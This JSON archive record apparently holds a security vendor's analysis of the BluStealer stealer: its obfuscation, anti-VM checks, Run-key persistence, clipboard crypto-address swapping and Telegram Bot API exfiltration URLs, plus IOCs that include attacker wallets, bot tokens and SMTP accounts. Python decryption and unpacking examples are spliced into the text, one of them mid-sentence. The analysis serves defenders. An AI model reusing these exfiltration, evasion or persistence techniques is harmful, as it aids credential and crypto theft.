{
	"id": "f963922b-ed17-403c-8997-8b3c14f28b63",
	"created_at": "2026-04-06T00:12:50.759783Z",
	"updated_at": "2026-04-10T03:20:44.353314Z",
	"deleted_at": null,
	"sha1_hash": "05cbc843983abec3b79e247bc015c89e3393bfcf",
	"title": "BluStealer: From SpyEx to ThunderFox",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6355331,
	"plain_text": "BluStealer: From SpyEx to ThunderFox\r\nBy Threat Research Team\r\nArchived: 2026-04-05 20:29:12 UTC\r\nOverview\r\nBluStealer is a crypto stealer, keylogger, and document uploader written in Visual Basic that loads C#.NET hack tools to\r\nsteal credentials. The family was first mentioned by @James_inthe_box in May and referred to as a310logger. In fact,\r\na310logger is just one of the namespaces within the .NET component that appeared in the string artifacts. Around July,\r\nFortinet referred to the same family as a “fresh malware”, and recently it was mentioned again as BluStealer by GoSecure. In\r\nthis blog, we go with the BluStealer naming while providing a fuller view of the family along with details of its\r\ninner workings.\r\na310logger is just one of the multiple C# hack tools in BluStealer’s .NET component.\r\nBluStealer is primarily spread through malspam campaigns. A large number of the samples we found come from a particular\r\ncampaign that is recognizable through the use of a unique .NET loader. The analysis of this loader is provided in the\r\n.NET Loader Walkthrough section below. Below are two BluStealer malspam samples. The first is a fake DHL invoice in\r\nEnglish. The second, in Spanish, is a fake message from General de Perfiles, a Mexican metal company. Both samples carry\r\n.iso attachments and download URLs for what the lure claims is a form the recipient needs to open and fill out to resolve\r\na problem. The attachments contain the malware executables packed with the mentioned .NET loader.\r\nhttps://decoded.avast.io/anhho/blustealer/\r\nPage 1 of 11\n\nIn the graph below, we can see a significant spike in BluStealer activity around September 10-11, 2021.\r\nThe daily number of Avast users protected from BluStealer\r\nBluStealer Analysis\r\nAs mentioned, BluStealer consists of a core written in Visual Basic and the C# .NET inner payload(s). Both components\r\nvary greatly among the samples, indicating the malware builder’s ability to customize each component separately. The VB\r\ncore reuses a large amount of code from a 2004 SpyEx project, hence the inclusion of “SpyEx” strings in early samples from\r\nMay. However, the malware authors have added the capabilities to steal crypto wallet data, swap crypto addresses present in\r\nthe clipboard, find and upload document files, and exfiltrate data through SMTP and the Telegram Bot API, as well as\r\nanti-analysis/anti-VM tactics. On the other hand, the .NET component is primarily a credential stealer that is patched together\r\nfrom a combination of open-source C# hack tools such as ThunderFox, ChromeRecovery, StormKitty, and firepwd. Note\r\nthat not all the mentioned features are available in a single sample.\r\nObfuscation\r\nExample of how the strings are decrypted within BluStealer\r\nEach string is encrypted with a unique key. Depending on the sample, the encryption algorithm can be the xor cipher, RC4,\r\nor the WinZip AES implementation from this repo. 
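The XOR and RC4 variants of this per-string encryption, as an added Python example; this is not the decryption utility from the original post and not BluStealer code. It assumes the analyst has already pulled each encrypted string and its own key out of the binary (how those artifacts are laid out in the sample is not modelled), and the ciphertexts below are constructed by encrypting two strings the write-up mentions with made-up keys:

```python
# Added example, not the decryption utility from the original post and not
# BluStealer code: decryptors for the XOR and RC4 string-encryption variants the
# write-up describes (the WinZip AES variant is not covered). Assumed layout:
# the analyst has already extracted each encrypted string together with its own
# per-string key; how those artifacts sit in the binary is not modelled here.
import string

PRINTABLE = set(string.printable.encode())


def xor_decrypt(data: bytes, key: bytes) -> bytes:
    # Repeating-key XOR: ciphertext byte i is XORed with key[i % len(key)].
    if not key:
        raise ValueError('empty key')
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def rc4_crypt(data: bytes, key: bytes) -> bytes:
    # Standard RC4: key scheduling (KSA), then the keystream generator (PRGA).
    # RC4 is symmetric, so the same call encrypts and decrypts.
    if not key:
        raise ValueError('empty key')
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def looks_like_text(blob: bytes) -> bool:
    # Cheap sanity check that catches a wrong key or a wrong algorithm guess:
    # a correctly decrypted string artifact should be printable ASCII.
    return len(blob) > 0 and all(b in PRINTABLE for b in blob)


def decrypt_string(blob: bytes, key: bytes, algo: str) -> str:
    # Decrypt one string artifact with its own key using the algorithm the
    # sample is known to use ('xor' or 'rc4'); refuse non-text output.
    if algo == 'xor':
        plain = xor_decrypt(blob, key)
    elif algo == 'rc4':
        plain = rc4_crypt(blob, key)
    else:
        raise ValueError('unsupported algorithm: ' + algo)
    if not looks_like_text(plain):
        raise ValueError('output is not printable text: wrong key or algorithm?')
    return plain.decode('ascii')


# Constructed sample data: plaintexts the write-up mentions, encrypted here with
# made-up per-string keys so that the example runs offline.
SAMPLES = [
    ('xor', bytes.fromhex('5a17c3'), b'credentials.txt'),
    ('rc4', b'k3y-for-this-string-only', b'Win32_ComputerSystem'),
]


def demo() -> list:
    # Encrypt each sample, then decrypt it the way an analyst would, and return
    # the recovered strings so the round trip can be checked.
    recovered = []
    for algo, key, plaintext in SAMPLES:
        blob = xor_decrypt(plaintext, key) if algo == 'xor' else rc4_crypt(plaintext, key)
        recovered.append(decrypt_string(blob, key, algo))
    return recovered


if __name__ == '__main__':
    for recovered in demo():
        print(recovered)
```

Because both ciphers are symmetric, the same routines produce the constructed test data and decrypt it; the printable-text check is what tells an analyst that a recovered key or a guessed algorithm is wrong instead of silently returning garbage.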
The original post shows a Python demonstration of the custom AES algorithm and links a utility to help decrypt all strings in IDA.\r\nAnti-VM Tactics\r\nBluStealer checks the following conditions:\r\nIf property Model of the Win32_ComputerSystem WMI class contains:\r\nVIRTUA (without L), VMware Virtual Platform, VirtualBox, microsoft corporation, vmware, VMware, vmw\r\nIf property SerialNumber of the Win32_BaseBoard WMI class contains 0 or None\r\nIf any of the following files exist:\r\nC:\\\\Windows\\\\System32\\\\drivers\\\\vmhgfs.sys\r\nC:\\\\Windows\\\\System32\\\\drivers\\\\vmmemctl.sys\r\nC:\\\\Windows\\\\System32\\\\drivers\\\\vmmouse.sys\r\nC:\\\\Windows\\\\System32\\\\drivers\\\\vmrawdsk.sys\r\nC:\\\\Windows\\\\System32\\\\drivers\\\\VBoxGuest\\.sys\r\nC:\\\\Windows\\\\System32\\\\drivers\\\\VBoxMouse.sys\r\nC:\\\\Windows\\\\System32\\\\drivers\\\\VBoxSF.sys\r\nC:\\\\Windows\\\\System32\\\\drivers\\\\VBoxVideo.sys\r\nIf any of these conditions is satisfied, BluStealer stops executing.\r\n.NET Component\r\nBluStealer retrieves the .NET payload(s) from the resource section and decrypts them with the above WinZip AES\r\nalgorithm using a hardcoded key. Then it executes one of the following command-line utilities to launch the .NET\r\nexecutable(s):\r\nC:\\Windows\\Microsoft.NET\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\AppLaunch.exe\r\nC:\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\InstallUtil.e\r\nExamples of two .NET executables loaded by the VB core. The stolen credentials are written to “credentials.txt”\r\nThe .NET component does not communicate with the VB core in any way. It steals the credentials of popular browsers and\r\napplications, then writes them to disk at a chosen location with a designated filename (e.g. credentials.txt). The VB core will\r\nlook for this drop and exfiltrate it later on. 
This mechanism is explained in the next section.\r\nThe .NET component is a copy-paste of the open-source C# projects listed below. You can find more information on their\r\nrespective GitHub pages:\r\nThunderFox: github.com/V1V1/SharpScribbles\r\nChromeRecovery: github.com/Elysian01/Chrome-Recovery\r\nStormKitty: github.com/swagkarna/StormKitty\r\nFirepwd: github.com/lclevy/firepwd\r\nInformation Stealer\r\nBoth the VB core and the .NET component write stolen information to the %appdata%\\Microsoft\\Templates folder. Each\r\ntype of stolen data is written to a different file with a predefined filename. The VB core sets up timers to watch over\r\neach file and keeps track of their sizes. When a file grows, the VB core sends it to the attacker.\r\nThe BluStealer VB core also detects crypto addresses copied to the clipboard and replaces them with the attacker’s\r\npredefined ones. Across samples, the following currencies are covered: Bitcoin, Bitcoin Cash, Ethereum, Monero, Litecoin.\r\nData Exfiltration\r\nBluStealer exfiltrates stolen data via SMTP (reusing SpyEx’s code) and the Telegram Bot API, hence the lack of any\r\nserver-side code. The Telegram token and chat_id are hardcoded to execute the two commands sendDocument and\r\nsendMessage, as shown below:\r\nhttps://api.telegram.org/bot[BOT TOKEN]/sendMessage?chat_id=[MY_CHANNEL_ID]\u0026text=\r\n[MY_MESSAGE_TEXT]\r\nhttps://api.telegram.org/bot[BOT TOKEN]/sendDocument?chat_id=[MY_CHANNEL_ID]\u0026caption=\r\n[MY_CAPTION]\r\nThe SMTP traffic is constructed following the Microsoft MimeOLE specification.\r\nExample of SMTP content\r\n.NET Loader Walkthrough\r\nThis .NET loader has been used by families such as Formbook, Agent Tesla, Snake Keylogger, Oski Stealer, RedLine, as\r\nwell as BluStealer.\r\nDemo sample: 19595e11dbccfbfeb9560e36e623f35ab78bb7b3ce412e14b9e52d316fbc7acc\r\nFirst Stage\r\nThe first stage of the .NET loader has a generic obfuscated look and isn’t matched by de4dot to any known .NET obfuscator.\r\nHowever, one recognizable characteristic is the inclusion of a single encrypted module in the resources:\r\nBy looking for this module’s reference within the code, we can quickly locate where it is decrypted and loaded into memory,\r\nas shown below.\r\nPrior to loading the next stage, the loader may check for internet connectivity or set up persistence through the Startup folder\r\nand registry Run keys. A few examples are:\r\nC:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\chrome\\chrom.exe\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\chrom\r\nC:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\paint\\paint.exe\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\paint\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup\r\nC:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\note\\notepad.exe\r\nIn the samples we looked at closely, the module is decrypted using RC4 with a hardcoded key. The key is obfuscated by a\r\nstring provider function. The best way to obtain the payload is to break at the tail jump that resides within the same\r\nnamespace where the encrypted module is referenced. In most cases it is the call to the external function Data().\r\nBelow are examples from the different samples:\r\nSecond stage\r\nInside the Data() function of the second stage, which has two strange resource files along with their getter functions\r\nThe second stage has its function calls and strings obfuscated, so the “Analyze” feature may not be as helpful. 
However,\r\nthere are two resource files that look out-of-place enough for us to pivot off. Their getter functions can be easily found in the\r\nResources class of the Properties namespace. Setting a breakpoint on the Ehiuuvbfrnprkuyuxqv getter function\r\n0x17000003 leads us to a function where it is gzip-decompressed, revealing a PE file.\r\nEhiuuvbfrnprkuyuxqv is decompressed with gzip\r\nOn the other hand, the breakpoint on the Ltvddtjmqumxcwmqlzcos getter function 0x17000004 leaves us in the middle of\r\nthe Data() function, where all the function calls are made by passing a field into the CompareComparator function, which\r\ninvokes it like a method.\r\nCompareComparator is used to invoke one of its arguments\r\nIn order to understand what is going on, we have to know which functions these fields represent. From past experience\r\nwith MassLogger, the field-to-method map file is likely embedded in the resource section, where in this\r\ncase the “Dic.Attr” naming is a strong tell.\r\nNote that it is important to find out where these fields are mapped to, because “Step into” may not get us directly to the\r\ndesignated functions. Some of the mapped functions are modified during the field-method binding process, so when the\r\ncorresponding fields are invoked, DynamicResolver.GetCodeInfo() is called to build the target function at run time.\r\nEven though the modification only consists of replacing some opcodes with equivalent ones while keeping the\r\nbehaviour the same, it is enough to obfuscate function calls during dynamic analysis.\r\nDic.Attr is interpreted into a field-method dictionary\r\nSearching for the “Dic.Attr” string leads us to the function where the mapping occurs. The dictionary value is the\r\nmethod token that will be bound, and the key is the corresponding field token. 
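Resolving such a field-to-method map into tokens a decompiler can look up, as an added Python example (not tooling from the post or from Avast). It encodes the two facts the walkthrough relies on: ECMA-335 metadata tokens carry the table id in the top byte and the row id in the low 24 bits, and the loader marks the methods it rebuilds at run time with a bogus table byte 0x4A that has to be rewritten to 0x06 (MethodDef). The map entries are constructed, apart from the pair the write-up quotes for RulesListener.IncludeState:

```python
# Added example, not the post's own tooling: decode a field-to-method map of the
# kind the loader keeps in its Dic.Attr / Params.Rules resources. Metadata
# tokens are 32-bit: top byte = metadata table, low 24 bits = row id. The loader
# marks methods it rebuilds at run time with the bogus table byte 0x4A, which
# must become 0x06 (MethodDef) before a decompiler can resolve the token.
# Map entries below are constructed except the IncludeState pair from the post.

TABLE_NAMES = {
    0x01: 'TypeRef', 0x02: 'TypeDef', 0x04: 'Field', 0x06: 'MethodDef',
    0x0A: 'MemberRef', 0x17: 'Property', 0x1B: 'TypeSpec', 0x2B: 'MethodSpec',
}
FIELD_TABLE = 0x04
METHODDEF_TABLE = 0x06
MEMBERREF_TABLE = 0x0A
BOGUS_METHOD_TABLE = 0x4A   # the loader's marker for run-time-rebuilt methods


def split_token(token: int):
    # Return (table id, row id) for a metadata token.
    return (token >> 24) & 0xFF, token & 0x00FFFFFF


def normalize_method_token(token: int) -> int:
    # Rewrite the 0x4A marker to a real MethodDef token; pass genuine
    # MethodDef / MemberRef tokens through unchanged; reject anything else.
    table, rid = split_token(token)
    if table == BOGUS_METHOD_TABLE:
        return (METHODDEF_TABLE << 24) | rid
    if table in (METHODDEF_TABLE, MEMBERREF_TABLE):
        return token
    raise ValueError('not a method token: 0x%08X' % token)


def describe(token: int) -> str:
    # Human-readable form, e.g. Property#3 for the getter token 0x17000003.
    table, rid = split_token(token)
    return '%s#%d' % (TABLE_NAMES.get(table, 'Table0x%02X' % table), rid)


def resolve_map(raw_map: dict) -> dict:
    # raw_map: field token -> method token as read from the resource.
    # Result: field token -> (resolved method token, was_patched flag).
    resolved = {}
    for field_tok, method_tok in raw_map.items():
        f_table, _ = split_token(field_tok)
        if f_table != FIELD_TABLE:
            raise ValueError('map key is not a Field token: 0x%08X' % field_tok)
        fixed = normalize_method_token(method_tok)
        resolved[field_tok] = (fixed, fixed != method_tok)
    return resolved


# Constructed map: one entry quoted in the write-up, two made up for the demo.
RAW_MAP = {
    0x04000220: 0x060000A3,   # RulesListener.IncludeState, as in the write-up
    0x04000221: 0x4A0000B1,   # constructed: loader-patched method, needs fixing
    0x04000222: 0x0A000015,   # constructed: MemberRef, an external call
}

if __name__ == '__main__':
    for field_tok, (method_tok, patched) in resolve_map(RAW_MAP).items():
        note = ' (rebuilt at run time)' if patched else ''
        print(describe(field_tok), '->', describe(method_tok) + note)
```

The patched flag is worth keeping: those are exactly the calls where Step into lands in DynamicResolver.GetCodeInfo() instead of the target, so an analyst knows in advance which invocations need a breakpoint on the resolved token rather than a step.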
Method tokens that start with 0x4A are the ones chosen to be modified for obfuscation purposes; replace the leading 0x4A\r\nwith 0x06 (the MethodDef table) to get the correct method tokens.\r\nWith all the function calls revealed, we can understand what’s going on inside the Data() method. First, it loads a new\r\nassembly, the decompressed Ehiuuvbfrnprkuyuxqv. Then it tries to create an instance of an object named\r\nSmartAssembly.Queues.MapFactoryQueue. Finally, a method called “RegisterSerializer” is invoked with the\r\ndata of the other resource file as an argument. At this point, we can assume that the purpose of this function is to\r\ndecrypt the other resource file and execute it.\r\nHeading to the newly loaded module (af43ec8096757291c50b8278631829c8aca13649d15f5c7d36b69274a76efdac), we can\r\nsee the SmartAssembly watermark and all the obfuscation features labeled as shown below.\r\nOverview of the decompressed Ehiuuvbfrnprkuyuxqv. Here the method RegisterSerializer can be found inside\r\nSmartAssembly.Queues.MapFactoryQueue\r\nThe unpacking process is not much different from the previous layer, but with the overhead of code virtualization. In\r\nstatic analysis, RegisterSerializer may look empty, but once the SmartAssembly.Queues class is instantiated the method\r\nis loaded properly:\r\nThe function content when analyzed statically.\r\nThe function content after instantiation. Note that the argument “res” holds the data of the second resource file\r\nFast forward to where res is processed inside RegisterSerializer()\r\nLuckily, the code looks fairly straightforward. The variable “res”, holding the encrypted data, is passed to the function\r\nthat the field RulesListener.IncludeState represents. Once again, the key is to find the field-token-to-method-token map file,\r\nwhich is likely to be located in the resource section. 
This time, searching for the GetManifestResourceStream function quickly gets us to the code section where the map is\r\nestablished:\r\nThe resource file Params.Rules is interpreted into a field-method dictionary\r\nRulesListener.IncludeState has token 0x04000220, which is mapped to function 0x060000A3. Inside this function, the\r\ndecryption algorithm is revealed anticlimactically: reversal and decompression:\r\nData from Ltvddtjmqumxcwmqlzcos is reversed\r\nThen it is decompressed and executed\r\nIn fact, all the samples can be unpacked simply by decompressing the reversed resource file embedded in the second\r\nstage. Hopefully, even when this algorithm is changed, my lengthy walkthrough will remain useful for showing how to\r\ndefeat the obfuscation tricks.\r\nConclusion\r\nIn this article, we break down BluStealer’s functionality and provide some utilities to deobfuscate it and extract its IOCs. We\r\nalso highlight its code reuse of multiple open-source projects. Despite writing stolen data to disk and lacking proper C2\r\nfunctionality, BluStealer is still a capable stealer. In the second half of the blog, we show how BluStealer samples and\r\nother malware can be unpacked from a unique .NET loader. 
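The reverse-then-decompress step the loader walkthrough ends on, as an added Python example (not the post's or Avast's unpacker). It assumes the compression is gzip, as it is for the first resource, and accepts a result only if it is a PE image; the resource bytes are constructed from a fake PE header rather than taken from a real sample:

```python
# Added example, not the post's or Avast's unpacker: undo the final layer of the
# .NET loader, a resource that was gzip-compressed and then byte-reversed
# (assumption: the decompression is gzip, as it is for the first resource).
# The payload used here is a constructed fake PE header, not a real sample.
import gzip
import struct
import zlib

PE_SIGNATURE = bytes.fromhex('50450000')   # the four bytes P, E, NUL, NUL


def unpack_reversed_gzip(resource: bytes) -> bytes:
    # The loader's transform in reverse: reverse the bytes, then gunzip.
    return gzip.decompress(resource[::-1])


def is_pe(data: bytes) -> bool:
    # Minimal PE check: MZ at offset 0 and e_lfanew (offset 0x3C) pointing at
    # the PE signature. Enough to tell a real image from decompressed noise.
    if len(data) < 0x40 or data[:2] != b'MZ':
        return False
    pe_off = struct.unpack_from('<I', data, 0x3C)[0]
    return data[pe_off:pe_off + 4] == PE_SIGNATURE


def extract_payload(resource: bytes) -> bytes:
    # Try the reversed form first (the Ltvddtjmqumxcwmqlzcos case), then plain
    # gzip (Ehiuuvbfrnprkuyuxqv is gzip-compressed without the reversal); only
    # a result that is a PE image is accepted.
    for candidate in (resource[::-1], resource):
        try:
            data = gzip.decompress(candidate)
        except (OSError, EOFError, zlib.error):
            continue
        if is_pe(data):
            return data
    raise ValueError('no PE image recovered from resource')


def embed_as_resource(payload: bytes, reverse: bool = True) -> bytes:
    # What a builder would embed: gzip the payload and, for the final-layer
    # resource, reverse the compressed bytes.
    packed = gzip.compress(payload)
    return packed[::-1] if reverse else packed


def build_fake_pe() -> bytes:
    # Constructed stand-in for a dropped executable: a DOS header whose e_lfanew
    # is 0x40, followed by the PE signature and filler. Not a loadable binary.
    header = bytearray(0x40)
    header[:2] = b'MZ'
    struct.pack_into('<I', header, 0x3C, 0x40)
    return bytes(header) + PE_SIGNATURE + b'constructed payload body'


def demo() -> bool:
    # Build what the second stage would embed and confirm the round trip.
    payload = build_fake_pe()
    return extract_payload(embed_as_resource(payload)) == payload


if __name__ == '__main__':
    print('recovered:', demo())
```

Trying the reversed form first and plain gzip second covers both resources the second stage carries; the PE header check is what stops the fallback from returning a decompression that succeeded but yielded nothing executable.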
With these insights, we hope that other analysts will have an\r\neasier time classifying and analyzing BluStealer.\r\nIOCs:\r\nThe full list of IoCs is available at https://github.com/avast/ioc/tree/master/BluStealer\r\nBluStealer\r\nSHA-256\r\n678e9028caccb74ee81779c5dd6627fb6f336b2833e9a99c4099898527b0d481\r\n3151ddec325ffc6269e6704d04ef206d62bba338f50a4ea833740c4b6fe770ea\r\n49da8145f85c63063230762826aa8d85d80399454339e47f788127dafc62ac22\r\n7abe87a6b675d3601a4014ac6da84392442159a68992ce0b24e709d4a1d20690\r\nCrypto Address List\r\nBitcoin:\r\n1ARtkKzd18Z4QhvHVijrVFTgerYEoopjLP (1.67227860 BTC)\r\n1AfFoww2ajt5g1YyrrfNYQfKJAjnRwVUsX (0.06755943 BTC)\r\n1MEf31xHgNKqyB7HEeAbcU6BhofMdwLE3r\r\n38atNsForzrDRhJoVAhyXsQLqWYfYgodd5\r\nbc1qrjl4ksg5h7p70jjtypr8s6cjpngzd3kerfj9rt\r\nbc1qjg3y4d4t6hwg6h22khknlxcstevjg2qkrxt6qu\r\n1KfRWVcShzwE2Atp1njogAqH8qodsif3pi\r\n3P6JnvWtubxbCxgPW7GAAj8u6CLV2h9MkY\r\n13vZcoMYRcKrDRDYUyH9Cd4kCRMZVjFkyn\r\nBitcoin Cash:\r\nqrej5ltx0sgk5c7aygdsvt2gh7fq04umvusxhxl7wq\r\nqrzakt59udz893u2uuwtgrwrjj9dhtk0gc3m4m2sj5\r\nEthereum:\r\n0xd070c48cd3bdeb8a6ca90310249aae90a7f26303 (0.10 ETH)\r\n0x95d3763546235393B77aC188E5B08dD4Af68d89D\r\n0xcfE71c720b7E99e555c0e98b725919B7a69f8Bb0\r\nMonero address:\r\n46W5WHQG2B1Df9uKrkyuhoLNVtJouMfPR9wMkhrzRiEtD2PmdcXMvQt52jQVWKXUC45hwYRXhBYVjLRbpDu8CK2UN2x\r\n43Q4G9CdM3iNbkwhujAQJ7TedSLxYQ8hJJHYqsqns7qz696gkPgMvUvDcDfZJ7bMzcaQeoSF86eFE2fL9njU59dQRfPHFnv\r\nLitecoin address:\r\nLfADbqTZoQhCPBr39mqQpf9myUiUiFrDBG\r\nLY5jmjdFnvgFjJET2wX5fVV6Gv89QdQRv3\r\nTelegram Tokens:\r\n1901905375:AAFoPAvBxaWxmDiYbdJWH-OdsUuObDY0pjs\r\n1989667182:AAFx2Rti45m06IscLpGbHo8v4659Q8swfkQ\r\nSMTP\r\nandres.galarraga@sismode.com (smtp.1and1.com)\r\ninfo@starkgulf.com (mail.starkgulf.com)\r\netopical@bojtai.club (mail.bojtai.club)\r\nfernando@digitaldirecto.es (smtp.ionos.es)\r\nbaerbelscheibll1809@gmail.com\r\ndashboard@grandamishabot.ru (shepherd.myhostcpl.com)\r\nshan@farm-finn.com (mail.farm-finn.com)\r\n.NET Loader SHA-256:\r\nae29f49fa80c1a4fb2876668aa38c8262dd213fa09bf56ee6c4caa5d52033ca1\r\n35d443578b1eb0708d334d3e1250f68550a5db4d630f1813fed8e2fc58a2c6d0\r\n097d0d1119fb73b1beb9738d7e82e1c73ab9c89a4d9b8aeed35976c76d4bad23\r\nc783bdf31d6ee3782d05fde9e87f70e9f3a9b39bf1684504770ce02f29d5b7e1\r\n42fe72df91aa852b257cc3227329eb5bf4fce5dabff34cd0093f1298e3b5454e\r\n1c29ee414b011a411db774015a98a8970bf90c3475f91f7547a16a8946cd5a81\r\n81bbcc887017cc47015421c38703c9c261e986c3fdcd7fef5ca4c01bcf997007\r\n6956ea59b4a70d68cd05e6e740598e76e1205b3e300f65c5eba324bebb31d7e8\r\n6322ebb240ba18119193412e0ed7b325af171ec9ad48f61ce532cc120418c8d5\r\n9f2bfedb157a610b8e0b481697bb28123a5eabd2df64b814007298dffd5e65ac\r\ne2dd1be91c6db4b52eab38b5409b39421613df0999176807d0a995c846465b38\r\nA group of elite researchers who like to stay under the radar.\r\nSource: https://decoded.avast.io/anhho/blustealer/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://decoded.avast.io/anhho/blustealer/"
	],
	"report_names": [
		"blustealer"
	],
	"threat_actors": [],
	"ts_created_at": 1775434370,
	"ts_updated_at": 1775791244,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/05cbc843983abec3b79e247bc015c89e3393bfcf.pdf",
		"text": "https://archive.orkl.eu/05cbc843983abec3b79e247bc015c89e3393bfcf.txt",
		"img": "https://archive.orkl.eu/05cbc843983abec3b79e247bc015c89e3393bfcf.jpg"
	}
}